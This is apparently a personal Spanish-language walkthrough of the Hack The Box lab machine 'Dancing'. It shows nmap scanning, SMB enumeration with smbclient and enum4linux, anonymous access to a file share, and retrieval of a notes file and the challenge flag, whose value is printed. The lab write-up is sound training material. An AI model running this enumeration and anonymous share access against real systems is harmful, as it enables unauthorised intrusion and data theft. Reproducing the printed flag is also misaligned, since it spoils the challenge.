##Conectados ya a la red de la máquina víctima.. 

##NMAP
Primer comando para descubrimiento de puertos 

nmap --open -sS -p- -sCV -n -Pn -vvv 10.129.221.145 -oG escaneoNmap

#En este caso en la PC víctima Dancing

##WhichSystem
Con nuestra función whichSystem y como parámetro la ip víctima 
nos reporta que estamos ante una máquina windows.

[*] 10.129.221.145 (ttl -> 127): Windows

## NMAP
#Por otro lado nos reporta algunos puertos abiertos
 
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

#¿Qué podemos hacer? 
Los puertos 135, 139, y 445 son típicos para RPC y SMB, 
mientras que los puertos HTTP (5985 y 47001) sugieren que Windows Remote
 Management (WinRM) está habilitado.

La pista inicial podría estar en SMB (puerto 445) para listar recursos 
compartidos o probar vulnerabilidades conocidas. 
Si tienes acceso mediante WinRM (5985), podrías buscar credenciales o configuraciones mal aseguradas para establecer una conexión remota.

#Indaguemos con:
nmap -p 139,445 --script smb-enum-shares 10.129.221.145 -n -T5

//output
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

##SMBCLIENT
Con smbclient: Si SMB está corriendo, 
puedes intentar listar los recursos compartidos:
smbclient -L // 10.129.221.145

Password for [WORKGROUP\pwn3r]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk
SMB1 disabled -- no workgroup available

#ENUM4LINUX
Obtengamos más información con:
enum4linux -a 10.129.221.145

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 25 18:13:28 2025

 =========================================( Target Information )=========================================

Target ........... 10.129.221.145
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

// Accedemos a los recursos compartidos de WorkShares

smbclient //10.129.221.145/WorkShares
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\pwn3r]:
Try "help" to get a list of possible commands.
smb: \> whoami
whoami: command not found
smb: \> ls
  .                                   D        0  Mon Mar 29 05:22:01 2021
  ..                                  D        0  Mon Mar 29 05:22:01 2021
  Amy.J                               D        0  Mon Mar 29 06:08:24 2021
  James.P                             D        0  Thu Jun  3 05:38:03 2021

		5114111 blocks of size 4096. 1752972 blocks available
smb: \>

// Descargamos los archivos que están compartidos, entre ellas la flag
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> ls
  .                                   D        0  Mon Mar 29 05:22:01 2021
  ..                                  D        0  Mon Mar 29 05:22:01 2021
  Amy.J                               D        0  Mon Mar 29 06:08:24 2021
  James.P                             D        0  Thu Jun  3 05:38:03 2021
cd
		5114111 blocks of size 4096. 1752954 blocks available
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 05:38:03 2021
  ..                                  D        0  Thu Jun  3 05:38:03 2021
  flag.txt                            A       32  Mon Mar 29 06:26:57 2021
g
		5114111 blocks of size 4096. 1752938 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0,0 KiloBytes/sec) (average 0,1 KiloBytes/sec)
smb: \James.P\>

// Revisamos lo que hemos obtenido: 

  pwn3r   ~/Desktop/HTB/Dancing/nmap  ls
 escaneoNmap   flag.txt   worknotes.txt
  pwn3r   ~/Desktop/HTB/Dancing/nmap  cat worknotes.txt
───────┬──────────────────────────────────────────────────────────────────────────────
       │ File: worknotes.txt
───────┼──────────────────────────────────────────────────────────────────────────────
   1   │ - start apache server on the linux machine
   2   │ - secure the ftp server
   3   │ - setup winrm on dancing
───────┴──────────────────────────────────────────────────────────────────────────────
  pwn3r   ~/Desktop/HTB/Dancing/nmap  cat flag.txt
───────┬──────────────────────────────────────────────────────────────────────────────
       │ File: flag.txt
───────┼──────────────────────────────────────────────────────────────────────────────
   1   │ 5f61c10dffbc77a704d76016a22f1664
